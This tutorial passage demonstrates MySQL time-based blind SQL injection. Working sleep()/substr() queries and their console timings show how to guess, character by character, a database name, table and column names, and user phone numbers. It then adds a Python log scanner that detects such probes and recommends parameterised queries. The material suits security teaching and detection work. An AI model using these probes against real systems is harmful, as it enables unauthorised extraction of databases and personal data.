No error message on the page is needed: the judgement is made from the page's response time.

MySQL time-based blind injection
================================
* Guessing the database name
- Below: a correct guess (the WHERE clause matches, so sleep(1) runs and the query takes about one second)
mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);
+----------+
| sleep(1) |
+----------+
| 0 |
+----------+
1 row in set (1.00 sec)
- Below: an incorrect guess (no row matches, so sleep() is never evaluated and the query returns immediately)
mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
Empty set (0.00 sec)
* Guessing table names
- mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='f';
+----------+
| sleep(1) |
+----------+
| 0 |
+----------+
1 row in set (1.00 sec)
- mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='x';
Empty set (0.00 sec)
* Guessing column names
- mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 1, 1)='i';
+----------+
| sleep(1) |
+----------+
| 0 |
+----------+
1 row in set (1.01 sec)
- mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 2, 1)='d';
+----------+
| sleep(1) |
+----------+
| 0 |
+----------+
1 row in set (1.00 sec)
* Guessing column values
- mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';
+----------+
| sleep(1) |
+----------+
| 0 |
+----------+
1 row in set (1.00 sec)
- mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';
- mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';
+----------+
| sleep(1) |
+----------+
| 0 |
+----------+
1 row in set (1.00 sec)
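Every probe above has the same shape: a delay primitive (sleep or benchmark) that only fires when a one-character test on substr/information_schema output holds. As an added, defender-side example that is not part of the original post, the Python scanner below flags general-log entries with that shape and counts probes per connection, since a real attack shows up as many near-identical queries from one session. The log line format and connection ids are constructed assumptions; two of the sample queries are the page's own.

```python
import re
from collections import Counter

# Constructed MySQL general-log style lines (not from the original page); two of
# them reuse the page's own probe queries so the detector sees realistic input.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z\t12 Query\tSELECT name FROM f_user WHERE id = 7
2024-01-01T10:00:02Z\t12 Query\tselect sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66)
2024-01-01T10:00:04Z\t12 Query\tselect sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='f'
2024-01-01T10:00:05Z\t13 Query\tSELECT SLEEP(0)
2024-01-01T10:00:06Z\t14 Query\tSELECT 1 WHERE BENCHMARK(5000000, MD5('x')) AND ascii(substring(user(),1,1))>64
"""

# Assumed log layout: "<timestamp>\t<connection id> Query\t<sql>".
LINE_RE = re.compile(r"^(?P<ts>\S+)\t(?P<conn>\d+) Query\t(?P<sql>.*)$")
# A delay call on its own (health checks, load tests) is not enough; pairing it
# with a character-extraction primitive is the signature of time-based probing.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
EXTRACT_RE = re.compile(
    r"\b(substr|substring|mid|ascii|ord|char|database|user|version)\s*\("
    r"|information_schema\.", re.I)

def classify(sql: str) -> bool:
    """True when a query pairs a delay primitive with an extraction primitive."""
    return bool(DELAY_RE.search(sql) and EXTRACT_RE.search(sql))

def scan(log_text: str):
    """Return flagged (conn, sql) pairs and the number of flagged probes per connection."""
    flagged, per_conn = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not Query records
        if classify(m["sql"]):
            flagged.append((m["conn"], m["sql"]))
            per_conn[m["conn"]] += 1
    return flagged, per_conn

if __name__ == "__main__":
    hits, counts = scan(SAMPLE_LOG)
    for conn, sql in hits:
        print(f"conn {conn}: {sql[:70]}")
    print("flagged probes per connection:", dict(counts))
```

Connections with a high probe count and response times clustering at the sleep() value are the ones to investigate; the application-side fix remains parameterised queries, which keep sleep() and substr() out of user-controlled SQL altogether.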
